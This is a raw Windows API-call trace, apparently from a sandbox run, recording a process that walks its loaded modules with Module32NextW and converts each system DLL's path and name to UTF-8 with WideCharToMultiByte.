	[0105.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\UserDataPlatformHelperUtil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\UserDataPlatformHelperUtil.dll", lpUsedDefaultChar=0x0) returned 51
	[0105.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UserDataPlatformHelperUtil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserDataPlatformHelperUtil.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.427] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\mswsock.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\mswsock.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mswsock.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mswsock.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.428] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\Windows.Devices.Enumeration.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\Windows.Devices.Enumeration.dll", lpUsedDefaultChar=0x0) returned 52
	[0105.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.Devices.Enumeration.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.Devices.Enumeration.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.430] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\deviceassociation.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\deviceassociation.dll", lpUsedDefaultChar=0x0) returned 42
	[0105.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deviceassociation.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="deviceassociation.dll", lpUsedDefaultChar=0x0) returned 22
	[0105.450] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\Windows.Media.Devices.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\Windows.Media.Devices.dll", lpUsedDefaultChar=0x0) returned 46
	[0105.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.Media.Devices.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.Media.Devices.dll", lpUsedDefaultChar=0x0) returned 26
	[0105.451] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\DevDispItemProvider.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\DevDispItemProvider.dll", lpUsedDefaultChar=0x0) returned 44
	[0105.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DevDispItemProvider.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DevDispItemProvider.dll", lpUsedDefaultChar=0x0) returned 24
	[0105.452] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DNSAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DNSAPI.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DNSAPI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DNSAPI.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.453] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\NSI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\NSI.dll", lpUsedDefaultChar=0x0) returned 28
	[0105.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NSI.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NSI.dll", lpUsedDefaultChar=0x0) returned 8
	[0105.455] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPHLPAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPHLPAPI.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.456] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\rasadhlp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\rasadhlp.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rasadhlp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rasadhlp.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.457] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\fwpuclnt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\fwpuclnt.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fwpuclnt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fwpuclnt.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.458] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DDORes.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DDORes.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DDORes.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DDORes.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.461] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DefaultDeviceManager.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DefaultDeviceManager.dll", lpUsedDefaultChar=0x0) returned 45
	[0105.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultDeviceManager.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultDeviceManager.dll", lpUsedDefaultChar=0x0) returned 25
	[0105.462] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL", lpUsedDefaultChar=0x0) returned 34
	[0105.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dhcpcsvc6.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dhcpcsvc6.DLL", lpUsedDefaultChar=0x0) returned 14
	[0105.463] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dhcpcsvc.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dhcpcsvc.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.464] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\AUDIOSES.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\AUDIOSES.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIOSES.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIOSES.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.466] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.467] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\Windows.Media.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\Windows.Media.dll", lpUsedDefaultChar=0x0) returned 38
	[0105.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows.Media.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows.Media.dll", lpUsedDefaultChar=0x0) returned 18
	[0105.468] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\ChatApis.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\ChatApis.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ChatApis.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ChatApis.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.469] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dsclient.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dsclient.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dsclient.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dsclient.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.470] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SystemEventsBrokerClient.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SystemEventsBrokerClient.dll", lpUsedDefaultChar=0x0) returned 49
	[0105.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SystemEventsBrokerClient.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemEventsBrokerClient.dll", lpUsedDefaultChar=0x0) returned 29
	[0105.472] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\PhoneUtil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\PhoneUtil.dll", lpUsedDefaultChar=0x0) returned 34
	[0105.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PhoneUtil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PhoneUtil.dll", lpUsedDefaultChar=0x0) returned 14
	[0105.473] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\PhoneCallHistoryApis.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\PhoneCallHistoryApis.dll", lpUsedDefaultChar=0x0) returned 45
	[0105.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PhoneCallHistoryApis.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PhoneCallHistoryApis.dll", lpUsedDefaultChar=0x0) returned 25
	[0105.474] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\ContactApis.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\ContactApis.dll", lpUsedDefaultChar=0x0) returned 36
	[0105.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ContactApis.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContactApis.dll", lpUsedDefaultChar=0x0) returned 16
	[0105.476] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ContactActivation.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ContactActivation.dll", lpUsedDefaultChar=0x0) returned 42
	[0105.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ContactActivation.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContactActivation.dll", lpUsedDefaultChar=0x0) returned 22
	[0105.477] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\UserDataLanguageUtil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\UserDataLanguageUtil.dll", lpUsedDefaultChar=0x0) returned 45
	[0105.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UserDataLanguageUtil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserDataLanguageUtil.dll", lpUsedDefaultChar=0x0) returned 25
	[0105.478] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\UserDataTypeHelperUtil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\UserDataTypeHelperUtil.dll", lpUsedDefaultChar=0x0) returned 47
	[0105.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UserDataTypeHelperUtil.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserDataTypeHelperUtil.dll", lpUsedDefaultChar=0x0) returned 27
	[0105.479] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msxml6.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msxml6.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msxml6.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msxml6.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.480] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\urlmon.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\urlmon.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="urlmon.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="urlmon.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.481] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\wininet.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\wininet.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wininet.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininet.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.482] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\tokenbinding.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\tokenbinding.dll", lpUsedDefaultChar=0x0) returned 37
	[0105.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tokenbinding.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tokenbinding.dll", lpUsedDefaultChar=0x0) returned 17
	[0105.483] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll", lpUsedDefaultChar=0x0) returned 48
	[0105.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ondemandconnroutehelper.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ondemandconnroutehelper.dll", lpUsedDefaultChar=0x0) returned 28
	[0105.503] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\winhttp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\winhttp.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="winhttp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winhttp.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.506] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ole32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ole32.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ole32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ole32.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.507] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINNSI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINNSI.DLL", lpUsedDefaultChar=0x0) returned 31
	[0105.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINNSI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINNSI.DLL", lpUsedDefaultChar=0x0) returned 11
	[0105.508] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
